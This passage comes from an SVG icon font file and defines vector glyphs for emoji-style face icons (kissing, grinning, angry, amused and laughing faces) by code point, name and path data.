<glyph unicode="&#xeba5;" glyph-name="face-stuck-out-tongue4" d="M416 320h-64v32h352v-32h-64v-80c0-61.73-50.144-112-112-112-61.73 0-112 50.144-112 112v80zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM448 320v-80c0-44.183 35.509-80 80-80 44.183 0 80 35.509 80 80v80h-160zM352 544h128v-32h-128v32z" />
<glyph unicode="&#xeba6;" glyph-name="kissing-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM592 336c-32 0-32-16-65.473-32-30.527 16-30.527 32-62.527 32s-64-48-112-48c32 0 80-96 174.527-96s145.473 96 177.473 96c-48 0-80 48-112 48v0z" />
<glyph unicode="&#xeba7;" glyph-name="kissing-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM592 336c-32 0-32-16-65.473-32-30.527 16-30.527 32-62.527 32s-64-48-112-48c32 0 80-96 174.527-96s145.473 96 177.473 96c-48 0-80 48-112 48z" />
<glyph unicode="&#xeba8;" glyph-name="grinning-face-teeth" d="M608 320v-32h-64v32h64zM640 320h15.794c21.063 0 38.876-13.357 45.473-32h-61.267v32zM608 224h-64v32h64v-32zM640 224v32h61.283c-6.597-18.723-24.472-32-45.489-32h-15.794zM512 320v-32h-64v32h64zM512 224h-64v32h64v-32zM416 320v-32h-61.283c6.597 18.723 24.472 32 45.489 32h15.794zM416 224h-15.794c-21.063 0-38.876 13.357-45.473 32v0h61.267v-32zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM400.209 352c-44.298 0-80.209-35.509-80.209-80 0-44.183 35.828-80 80.209-80h255.582c44.298 0 80.209 35.509 80.209 80 0 44.183-35.828 80-80.209 80h-255.582zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128z" />
<glyph unicode="&#xeba9;" glyph-name="grinning-face-teeth2" d="M608 320v-32h-64v32h64zM640 320h15.794c21.063 0 38.876-13.357 45.473-32h-61.267v32zM608 224h-64v32h64v-32zM640 224v32h61.283c-6.597-18.723-24.472-32-45.489-32h-15.794zM512 320v-32h-64v32h64zM512 224h-64v32h64v-32zM416 320v-32h-61.283c6.597 18.723 24.472 32 45.489 32h15.794zM416 224h-15.794c-21.063 0-38.876 13.357-45.473 32v0h61.267v-32zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 480c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 480c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM608 640h128v-32h-128v32zM320 640h128v-32h-128v32z" />
<glyph unicode="&#xebaa;" glyph-name="angry-face-teeth" d="M608 320v-32h-64v32h64zM640 320h15.794c21.063 0 38.876-13.357 45.473-32h-61.267v32zM608 224h-64v32h64v-32zM640 224v32h61.283c-6.597-18.723-24.472-32-45.489-32h-15.794zM512 320v-32h-64v32h64zM512 224h-64v32h64v-32zM416 320v-32h-61.283c6.597 18.723 24.472 32 45.489 32h15.794zM416 224h-15.794c-21.063 0-38.876 13.357-45.473 32v0h61.267v-32zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM400.209 352c-44.298 0-80.209-35.509-80.209-80 0-44.183 35.828-80 80.209-80h255.582c44.298 0 80.209 35.509 80.209 80 0 44.183-35.828 80-80.209 80h-255.582zM684.111 641.053l17.894-26.529-106.117-71.577-17.894 26.529 106.117 71.577zM478.005 569.476l-17.894-26.529-106.117 71.577 17.894 26.529 106.117-71.577z" />
<glyph unicode="&#xebab;" glyph-name="angry-face-teeth2" d="M608 320v-32h-64v32h64zM640 320h15.794c21.063 0 38.876-13.357 45.473-32h-61.267v32zM608 224h-64v32h64v-32zM640 224v32h61.283c-6.597-18.723-24.472-32-45.489-32h-15.794zM512 320v-32h-64v32h64zM512 224h-64v32h64v-32zM416 320v-32h-61.283c6.597 18.723 24.472 32 45.489 32h15.794zM416 224h-15.794c-21.063 0-38.876 13.357-45.473 32v0h61.267v-32zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 480c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 480c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM684.111 641.053l17.894-26.529-106.117-71.577-17.894 26.529 106.117 71.577zM478.005 569.476l-17.894-26.529-106.117 71.577 17.894 26.529 106.117-71.577z" />
<glyph unicode="&#xebac;" glyph-name="worried-face-teeth" d="M608 320v-32h-64v32h64zM640 320h15.794c21.063 0 38.876-13.357 45.473-32h-61.267v32zM608 224h-64v32h64v-32zM640 224v32h61.283c-6.597-18.723-24.472-32-45.489-32h-15.794zM512 320v-32h-64v32h64zM512 224h-64v32h64v-32zM416 320v-32h-61.283c6.597 18.723 24.472 32 45.489 32h15.794zM416 224h-15.794c-21.063 0-38.876 13.357-45.473 32v0h61.267v-32zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM400.209 352c-44.298 0-80.209-35.509-80.209-80 0-44.183 35.828-80 80.209-80h255.582c44.298 0 80.209 35.509 80.209 80 0 44.183-35.828 80-80.209 80h-255.582zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xebad;" glyph-name="worried-face-teeth2" d="M528 832c-220.9 0-400-179.1-400-400s179.1-400 400-400 400 179.1 400 400-179.1 400-400 400zM290 569.5l106.1 71.6 17.9-26.5-106.1-71.6-17.9 26.5zM416 224h-15.8c-21.1 0-38.9 13.4-45.5 32h61.3v-32zM416 288h-61.3c6.6 18.7 24.5 32 45.5 32h15.8v-32zM384 480c-17.7 0-32 14.3-32 32s14.3 32 32 32c17.7 0 32-14.3 32-32s-14.3-32-32-32zM512 224h-64v32h64v-32zM512 288h-64v32h64v-32zM640 320h15.8c21.1 0 38.9-13.4 45.5-32h-61.3v32zM608 224h-64v32h64v-32zM608 288h-64v32h64v-32zM655.8 224h-15.8v32h61.3c-6.6-18.7-24.5-32-45.5-32zM672 480c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32c0-17.7-14.3-32-32-32zM748.1 542.9l-106.1 71.6 17.9 26.5 106.1-71.5-17.9-26.6z" />
<glyph unicode="&#xebae;" glyph-name="grinning-face-teeth3" d="M608 320v-32h-64v32h64zM640 320h15.794c21.063 0 38.876-13.357 45.473-32h-61.267v32zM608 224h-64v32h64v-32zM640 224v32h61.283c-6.597-18.723-24.472-32-45.489-32h-15.794zM512 320v-32h-64v32h64zM512 224h-64v32h64v-32zM416 320v-32h-61.283c6.597 18.723 24.472 32 45.489 32h15.794zM416 224h-15.794c-21.063 0-38.876 13.357-45.473 32v0h61.267v-32zM528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 512c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM400.209 352c-44.298 0-80.209-35.509-80.209-80 0-44.183 35.828-80 80.209-80h255.582c44.298 0 80.209 35.509 80.209 80 0 44.183-35.828 80-80.209 80h-255.582z" />
<glyph unicode="&#xebaf;" glyph-name="grinning-face-teeth4" d="M608 320v-32h-64v32h64zM640 320h15.794c21.063 0 38.876-13.357 45.473-32h-61.267v32zM608 224h-64v32h64v-32zM640 224v32h61.283c-6.597-18.723-24.472-32-45.489-32h-15.794zM512 320v-32h-64v32h64zM512 224h-64v32h64v-32zM416 320v-32h-61.283c6.597 18.723 24.472 32 45.489 32h15.794zM416 224h-15.794c-21.063 0-38.876 13.357-45.473 32v0h61.267v-32zM528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM384 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32zM672 512c-17.673 0-32 14.327-32 32s14.327 32 32 32c17.673 0 32-14.327 32-32s-14.327-32-32-32z" />
<glyph unicode="&#xebb0;" glyph-name="face-open-mouth-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128z" />
<glyph unicode="&#xebb1;" glyph-name="face-open-mouth-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128z" />
<glyph unicode="&#xebb2;" glyph-name="face-open-mouth-eyebrows3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xebb3;" glyph-name="face-open-mouth-eyebrows4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80zM659.889 641.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM289.995 569.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xebb4;" glyph-name="angry-face-open-mouth-eyebrows" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM684.111 641.053l17.894-26.529-106.117-71.577-17.894 26.529 106.117 71.577zM478.005 569.476l-17.894-26.529-106.117 71.577 17.894 26.529 106.117-71.577z" />
<glyph unicode="&#xebb5;" glyph-name="angry-face-open-mouth-eyebrows2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80zM684.111 641.053l-106.117-71.577 17.894-26.529 106.117 71.577-17.894 26.529zM478.005 569.476l-106.117 71.577-17.894-26.529 106.117-71.577 17.894 26.529z" />
<glyph unicode="&#xebb6;" glyph-name="unamused-face-tightly-closed-eyes" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32v0zM689.941 430.059l-90.51 90.51 90.51 90.51 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627zM366.059 611.078l90.51-90.51-90.51-90.51-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627z" />
<glyph unicode="&#xebb7;" glyph-name="unamused-face-tightly-closed-eyes2" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM527.902 256c-95.902 0-143.902-32-143.902-32s32 96 144 96c112 0 144-96 144-96s-48.195 32-144.098 32zM689.941 430.059l-90.51 90.51 90.51 90.51 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627zM366.059 611.078l90.51-90.51-90.51-90.51-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627z" />
<glyph unicode="&#xebb8;" glyph-name="sad-face--tightly-closed-eyes" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64v0zM689.941 430.059l-90.51 90.51 90.51 90.51 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627zM366.059 611.078l90.51-90.51-90.51-90.51-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627z" />
<glyph unicode="&#xebb9;" glyph-name="sad-face--tightly-closed-eyes2" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64zM689.941 430.059l-90.51 90.51 90.51 90.51 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627zM366.059 611.078l90.51-90.51-90.51-90.51-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627z" />
<glyph unicode="&#xebba;" glyph-name="kissing-face3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0zM592 336c-32 0-32-16-65.473-32-30.527 16-30.527 32-62.527 32s-64-48-112-48c32 0 80-96 174.527-96s145.473 96 177.473 96c-48 0-80 48-112 48v0z" />
<glyph unicode="&#xebbb;" glyph-name="kissing-face4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM608 640v-32h128v32h-128zM320 640v-32h128v32h-128zM384 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM672 480c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32zM592 336c-32 0-32-16-65.473-32-30.527 16-30.527 32-62.527 32s-64-48-112-48c32 0 80-96 174.527-96s145.473 96 177.473 96c-48 0-80 48-112 48z" />
<glyph unicode="&#xebbc;" glyph-name="face-closed-meyes" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64v0z" />
<glyph unicode="&#xebbd;" glyph-name="face-closed-meyes2" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM339.889 609.053l106.117-71.577-17.894-26.529-106.117 71.577 17.894 26.529zM609.995 537.476l106.117 71.577 17.894-26.529-106.117-71.577-17.894 26.529zM527.402 288c-111.402 0-175.402-64-175.402-64v32c0 0 64 64 175.402 64s176.598-64 176.598-64v-32c0 0-65.195 64-176.598 64z" />
<glyph unicode="&#xebbe;" glyph-name="amused-face" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM320 544v-32h128v32h-128zM608 544v-32h128v32h-128zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0z" />
<glyph unicode="&#xebbf;" glyph-name="amused-face2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM320 544v-32h128v32h-128zM608 544v-32h128v32h-128zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32z" />
<glyph unicode="&#xebc0;" glyph-name="amused-face-closed-eyes" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0z" />
<glyph unicode="&#xebc1;" glyph-name="amused-face-closed-eyes2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32z" />
<glyph unicode="&#xebc2;" glyph-name="amused-face-closed-eyes3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32v0z" />
<glyph unicode="&#xebc3;" glyph-name="amused-face-closed-eyes4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM527.902 288c-95.902 0-143.902 32-143.902 32s32-96 144-96c112 0 144 96 144 96s-48.195-32-144.098-32z" />
<glyph unicode="&#xebc4;" glyph-name="face-closed-eyes-open-mouth" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM320 544v-32h128v32h-128zM608 544v-32h128v32h-128zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xebc5;" glyph-name="face-closed-eyes-open-mouth2" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM320 544v-32h128v32h-128zM608 544v-32h128v32h-128zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80z" />
<glyph unicode="&#xebc6;" glyph-name="face-closed-eyes-open-mouth3" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xebc7;" glyph-name="face-closed-eyes-open-mouth4" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80zM627.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM321.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577z" />
<glyph unicode="&#xebc8;" glyph-name="face-closed-eyes-open-mouth5" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM528 192v0c-44.183 0-80 35.817-80 80s35.817 80 80 80c44.183 0 80-35.817 80-80s-35.817-80-80-80zM528 224c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xebc9;" glyph-name="face-closed-eyes-open-mouth6" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM339.889 609.053l-17.894-26.529 106.117-71.577 17.894 26.529-106.117 71.577zM609.995 537.476l17.894-26.529 106.117 71.577-17.894 26.529-106.117-71.577zM528 192c44.183 0 80 35.817 80 80s-35.817 80-80 80c-44.183 0-80-35.817-80-80s35.817-80 80-80z" />
<glyph unicode="&#xebca;" glyph-name="laughing-face5" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM597.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627zM277.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627zM288 352h480c0 0-32-192-240-192s-240 192-240 192zM331.027 320c0 0 41.198-128.43 197.761-128.43s195.766 128.43 195.766 128.43h-393.527z" />
<glyph unicode="&#xebcb;" glyph-name="laughing-face6" d="M528 32c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM597.49 518.627l22.627-22.627 67.882 67.882 67.882-67.882 22.627 22.627-90.51 90.51-90.51-90.51zM277.49 518.627l22.627-22.627 67.882 67.882 67.882-67.882 22.627 22.627-90.51 90.51-90.51-90.51zM288 352c0 0 32-192 240-192s240 192 240 192h-480z" />
<glyph unicode="&#xebcc;" glyph-name="smiling-face5" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM527.402 256c-111.402 0-175.402 64-175.402 64v-32c0 0 64-64 175.402-64s176.598 64 176.598 64v32c0 0-65.195-64-176.598-64v0zM597.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627zM277.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627z" />
<glyph unicode="&#xebcd;" glyph-name="smiling-face6" d="M528 32c220.914 0 400 179.086 400 400s-179.086 400-400 400c-220.914 0-400-179.086-400-400s179.086-400 400-400zM527.402 256c111.402 0 176.598 64 176.598 64v-32c0 0-65.195-64-176.598-64s-175.402 64-175.402 64v32c0 0 64-64 175.402-64zM597.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627zM277.49 518.627l90.51 90.51 90.51-90.51-22.627-22.627-67.882 67.882-67.882-67.882-22.627 22.627z" />
